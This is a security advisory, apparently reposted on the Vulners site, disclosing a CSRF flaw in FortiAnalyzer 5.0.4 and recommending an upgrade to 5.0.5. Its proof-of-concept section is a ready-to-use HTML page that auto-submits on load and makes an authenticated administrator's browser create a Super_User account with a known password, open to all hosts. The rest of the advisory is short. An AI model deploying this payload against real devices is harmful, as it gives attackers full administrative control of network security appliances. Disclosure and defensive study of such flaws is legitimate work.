Vulners
Lucene search
FortiAnalyzer 5.0.4 - CSRF Vulnerability
Cert(R) no respond my email, not Fortinet has not given the credits.
I. VULNERABILITY
-------------------------
CSRF vulnerabilities in OS of fortianalyzer 5.0.4
II. BACKGROUND
-------------------------
Fortinet’s industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.
III. DESCRIPTION
-------------------------
Has been detected a CSRF vulnerability in FortiAnalyzer in
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" 5.0.4 , that
allows the execution attackers to hijack the authentication of
administrators for requests that modify settings or creation of user
administrator in fortianalyzer, because this functions are not
protected by CSRF-Tokens.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “csrf_token”
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog.
<html>
<body onload="CSRF.submit();">
<html>
<body onload="CSRF.submit();">
<form id="csrf"
action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog"
method="post" name="CSRF">
<input name="userId" value="user.via.cfsr"> </input>
<input name="type" value="0"> </input>
<input name="rserver" value=""> </input>
<input name="lserver" value=""> </input>
<input name="subject" value=""> </input>
<input name="cacerts" value="Fortinet_CA2"> </input>
<input name="password" value="123456"> </input>
<input name="password_updated" value="1"> </input>
<input name="confirm_pwd" value="123456"> </input>
<input name="confirm_pwd_updated" value="1"> </input>
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="profile" value="Super_User"> </input>
<input name="alladomRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_pack" value=""> </input>
<input name="desc" value=""> </input>
<input name="showForce" value="0"> </input>
<input name="numhosts" value="0"> </input>
<input name="numhosts6" value="3"> </input>
<input name="_comp_8" value="OK"> </input>
<input name="actionevent" value="new"> </input>
<input name="profileId" value=""> </input>
<input name="mgt" value=""> </input>
<input name="dashboard" value=""> </input>
<input name="dashboardmodal" value=""> </input>
<input name="csrf_token" value=""> </input>
</form>
</body>
</html>
V. BUSINESS IMPACT
-------------------------
That allows the execution attackers to hijack the authentication of
administrators for requests that modify settings or creation of user
administrator in fortianalyzer and have access all function of box.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try Fortianalyzer VM or appliance v5.0.4
VIII. SOLUTION
-------------------------
UpGrade for v5.0.5
POC
https://vimeo.com/78776768
By William Costa
[email protected]
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2013 00:00Current
7.1High risk
Vulners AI Score7.1